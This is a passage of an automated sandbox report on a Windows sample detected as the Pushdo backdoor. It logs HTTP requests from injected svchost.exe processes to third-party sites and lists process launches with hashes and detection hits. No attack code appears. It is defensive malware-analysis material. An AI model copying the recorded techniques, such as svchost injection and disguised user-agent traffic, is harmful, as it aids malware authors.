                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3219INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      88192.168.2.527483104.21.65.224443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3219OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: hyab.com
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:58 UTC3220INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:58 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding,User-Agent
                                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=a78d670f716f54abce2c22ba973ab5e9; path=/
                                                                                                                                                                                                                                                                                                      Location: https://hyabmagneter.se
                                                                                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t60%2BmP9T1iRc3LmVRp9zz5Ri0FkNaobyHP9OO%2FBgsXs5V17%2Bc5O1EvBRloPs4st%2FhlSS%2BA%2BYaJWFqEff0hanIbbNM29h2MTEPbG0pQ7gQEDzpvDLFhA%2F7Qv%2BNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      CF-RAY: 7abbc9c41ff4383d-FRA
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:58 UTC3221INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      89192.168.2.527491185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3219OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: techtrans.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3219INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:57 GMT
                                                                                                                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                      Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                      Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3219INData Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      9192.168.2.55031691.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:31 UTC67OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:31 UTC68INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:16 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:31 UTC68INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                                                      Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:31 UTC84INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 30 33 2e 31 30 2e 32 30 32 32 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 32 30 30 30 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 03.10.2022 </div>2000 </div> </article> </section> </section></div>... topnews. -->... co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:31 UTC100INData Raw: 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 0d 0a 31 30 30 30 0d 0a 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20
                                                                                                                                                                                                                                                                                                      Data Ascii: :10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=1657112618" alt="Zo1000sta jednym z nas - PRACA W POLICJI" /></a></div><div class="item" style="width:300px;
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:31 UTC116INData Raw: 77 65 72 73 6a 65 20 70 6f 72 74 61 6c 75 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0d 0a 31 38 33 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                      Data Ascii: wersje portalu</h2> <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul>183 <div class="clear"></div> </div> </div>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      90192.168.2.52750383.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:57 UTC3220OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: dataform.co.uk


                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                                      Start time:05:43:01
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                      File size:259072 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:9FAEA65CFF61AD64E4BC4C3913C336BE
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000000.00000002.671122999.0000000010004000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000000.00000002.651890416.0000000002790000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                                                                                      Start time:05:43:15
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                      File size:259072 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:9FAEA65CFF61AD64E4BC4C3913C336BE
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000001.00000002.642040224.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000001.00000002.669497358.0000000010004000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                                      • Detection: 30%, ReversingLabs
                                                                                                                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                                                                      Start time:05:43:27
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\pigalicapi.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\pigalicapi.exe"
                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                      File size:259072 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:9FAEA65CFF61AD64E4BC4C3913C336BE
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000002.00000002.642410962.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_Pushdo, Description: Yara detected Backdoor Pushdo, Source: 00000002.00000002.670270360.0000000010004000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                                                                      Start time:05:43:45
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                                                                                      Start time:05:43:59
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                                                                                      Start time:05:44:15
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                                                                      Start time:05:44:23
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                                                                      Start time:05:44:23
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                                                                                                      Start time:05:44:24
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                                                                                      Start time:05:44:25
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                                                                                      Start time:05:44:34
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                                                                      Start time:05:44:36
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                                                                                      Start time:05:44:37
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                                                                                      Start time:05:44:38
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                                                                                      Start time:05:44:40
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                                                                      Start time:05:44:53
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                                                                                                      Start time:05:44:55
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
